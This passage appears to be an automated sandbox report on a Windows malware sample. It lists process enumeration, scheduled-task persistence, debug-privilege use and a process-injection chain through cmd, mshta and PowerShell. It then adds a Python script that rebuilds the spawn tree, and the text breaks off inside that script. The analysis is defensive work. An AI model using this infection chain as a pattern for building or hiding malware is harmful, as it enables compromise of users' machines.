N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\ProgramData\rjbum\abfjdu.exe N/A
N/A N/A C:\ProgramData\rjbum\abfjdu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 228 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 228 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 228 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2816 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2816 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2816 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2816 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1488 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1488 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1488 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2816 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 2816 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 1012 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1012 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1012 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2816 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
PID 2816 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
PID 2816 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
PID 3928 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\cmd.exe
PID 3928 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\mshta.exe
PID 3928 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\mshta.exe
PID 3928 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe C:\Windows\SysWOW64\mshta.exe
PID 4088 wrote to memory of 3108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4088 wrote to memory of 3108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4088 wrote to memory of 3108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3392 wrote to memory of 2132 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3392 wrote to memory of 2132 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3392 wrote to memory of 2132 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3996 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3996 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4960 wrote to memory of 3928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4960 wrote to memory of 3928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3928 wrote to memory of 372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3996 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2320 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 372 wrote to memory of 4960 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 372 wrote to memory of 4960 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3928 wrote to memory of 3380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3996 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2164 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
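The WriteProcessMemory rows above are the only parent-to-child linkage this report exposes, so the spawn chain has to be rebuilt from them. As an added example, not part of the sandbox output, the following Python parses a verbatim subset of those rows, drops the repeated writes (the report emits one row per write), and rebuilds the tree keyed on (PID, image) rather than PID alone. That distinction matters for this sample: the sandbox recycled PID 3928 (first 840fb92a2b.exe, later powershell.exe) and PID 4960 (first powershell.exe, later cvtres.exe), so a PID-only tree would contain the cycle 4960 -> 3928 -> 372 -> 4960 and would hang 840fb92a2b.exe's children under the wrong process. Function names and the output layout are this example's own.

```python
"""Rebuild the spawn/injection chain from the 'Suspicious use of
WriteProcessMemory' rows above and flag PIDs the sandbox recycled."""
import re
from collections import defaultdict

# Rows copied from the table above (a subset). The first row is repeated on
# purpose: the report lists one row per write, so duplicates are expected.
ROWS = r"""
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 3616 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
PID 228 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2816 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
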